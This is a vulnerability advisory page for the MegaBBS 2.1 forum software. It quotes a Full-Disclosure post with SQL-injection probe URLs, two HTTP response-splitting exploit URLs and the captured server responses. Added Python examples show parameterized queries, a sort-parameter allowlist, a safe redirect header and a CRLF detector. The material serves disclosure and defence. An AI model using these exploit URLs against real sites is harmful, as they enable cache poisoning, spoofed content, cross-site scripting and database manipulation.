SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   MegaBBS
Vendors:   PD9 Software
MegaBBS Input Validation Errors Let Remote Users Inject SQL Commands and Conduct Response Splitting Attacks
SecurityTracker Alert ID:  1011420
SecurityTracker URL:  http://securitytracker.com/id/1011420
CVE Reference:   CVE-2004-2145, CVE-2004-2146
Updated:  Jul 2 2005
Original Entry Date:  Sep 27 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 2.1
Description:   Several vulnerabilities were reported in MegaBBS. A remote user can inject SQL commands. A remote user can conduct an HTTP response splitting attack.

The 'ladder-log.asp' and 'view-profile.asp' scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
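The probe values above all end in a single quote: when a parameter is spliced into the SQL text, the stray quote unbalances the statement and the database errors out, which is how the reporter confirmed each parameter was being interpreted as SQL. The following is an added example, not MegaBBS or PD9 Software code, that reproduces the two query-building patterns against an in-memory SQLite table. The table layout, column names, the allowlist contents and all helper names are assumptions made for illustration.

```python
"""Added example (not MegaBBS code): a lookup in the style of
view-profile.asp?memberid=... built two ways, plus an allowlist for the
ladder-log sort parameters, exercised against constructed SQLite data."""
import sqlite3

# Constructed sample data standing in for a forum member table (assumed schema).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE members (memberid INTEGER, username TEXT)")
_conn.executemany("INSERT INTO members VALUES (?, ?)", [(1, "alice"), (2, "bob")])
_conn.commit()


def lookup_member_vulnerable(memberid: str) -> list:
    """Concatenates the raw request parameter into the SQL text.

    With the advisory's probe value 1' the resulting statement contains an
    unterminated string literal and SQLite raises OperationalError: the
    parameter is being parsed as SQL syntax, not treated as data."""
    sql = "SELECT memberid, username FROM members WHERE memberid = '" + memberid + "'"
    return _conn.execute(sql).fetchall()


def vulnerable_query_errors(memberid: str) -> bool:
    """True when the concatenating query fails on this input (the symptom the
    advisory's test URLs look for)."""
    try:
        lookup_member_vulnerable(memberid)
    except sqlite3.OperationalError:
        return True
    return False


def lookup_member_safe(memberid: str) -> list:
    """Validates the type first, then binds the value as a parameter.

    A non-numeric id is simply 'no such member'; a numeric one is sent to the
    driver as a bound integer and can never alter the statement's structure."""
    if not memberid.isdigit():
        return []
    sql = "SELECT memberid, username FROM members WHERE memberid = ?"
    return _conn.execute(sql, (int(memberid),)).fetchall()


# Column names assumed for the ladder-log page; only these may appear in ORDER BY.
ALLOWED_SORT_COLUMNS = {"completeddate", "id"}


def build_ladder_query(sortby: str, sortdir: str) -> str:
    """Identifiers (sort column, sort direction) cannot be bound as parameters,
    so each is mapped through a fixed allowlist before being spliced in."""
    if sortby not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unknown sort column")
    direction = {"0": "ASC", "1": "DESC"}.get(sortdir)
    if direction is None:
        raise ValueError("unknown sort direction")
    return f"SELECT * FROM ladder_log ORDER BY {sortby} {direction}"
```

The split between the two halves is the point: values (`memberid`, `criteria`) go through bind parameters, while identifiers (`sortby`, `sortdir`) can only be handled by mapping the request value onto a fixed set of known-good SQL fragments.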

A remote user can also submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

Some demonstration exploit URLs are provided:

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat
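The mechanism in both URLs is the same: the `fid` value is copied, unencoded, into the `Location` header of the 302 redirect, so the percent-encoded CR/LF pairs terminate that header, end the first response and let the attacker-supplied text be read as a second, complete HTTP response. The example below is added here and is not MegaBBS or IIS code; it shows the redirect built so that line breaks cannot reach the header, and a check that flags request URLs carrying this pattern for log review. The redirect path is taken from the response captured in the source message; the constant names, the helper names and the benign sample URL are assumptions.

```python
"""Added example (not MegaBBS or IIS code): a line-break-safe Location header
for the forum-view redirect, and a query-string check for CRLF injection."""
from urllib.parse import parse_qsl, quote, urlsplit

# Redirect target seen in the advisory's captured 302 response.
REDIRECT_BASE = "/megabbs/forums/forum-view.asp?fid="

# The advisory's first exploit URL, embedded here as test input.
ADVISORY_URL = (
    "http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew"
    "&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a"
    "%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a"
    "&tid=4924&replyto=22947&displaytype=flat"
)
# Constructed benign request to the same script (assumed normal parameter values).
BENIGN_URL = "http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=12&displaytype=flat"


class HeaderInjection(ValueError):
    """Raised when a value destined for an HTTP header line contains CR or LF."""


def build_location_header(fid: str) -> str:
    """Builds the redirect's Location header from the request parameter.

    Two independent defences: any raw CR/LF is rejected outright, and the
    value is percent-encoded so that only URL-safe bytes are ever written
    into the header line. Either one alone closes the splitting hole."""
    if "\r" in fid or "\n" in fid:
        raise HeaderInjection("CR/LF in redirect parameter")
    return "Location: " + REDIRECT_BASE + quote(fid, safe="")


def splitting_indicators(url: str) -> list:
    """Names of query parameters whose percent-decoded value contains a line
    break, the shape of the advisory's exploit URLs. parse_qsl does the
    decoding, so %0d%0a and a literal CRLF are caught alike."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if "\r" in value or "\n" in value:
            hits.append(name)
    return hits
```

Encoding the value, rather than only rejecting it, is what makes the header safe by construction: `quote("12\r\n", safe="")` yields `12%0D%0A`, which stays inside the `Location` line instead of terminating it. The indicator check is deliberately broad (any decoded CR or LF in any parameter), since a legitimate forum id never contains one.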

Impact:   A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

A remote user can inject SQL commands.

Solution:   The vendor has released a fix, available at:

http://www.pd9soft.com/

[Editor's note: It appears that the vendor has not incremented the version number in the fixed version.]

Vendor URL:  www.pd9soft.com/megabbs-support/index.asp
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum


URL: http://www.pd9soft.com 
Tested megabbs 2.1 

1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:14:02 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:13:02 GMT 
Set-Cookie: guestID=309; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ 
Cache-contro
<...>


2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:34:05 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:33:05 GMT 
Set-Cookie: guestID=421; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ 
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' 
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'


MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Copyright 2021, SecurityGlobal.net LLC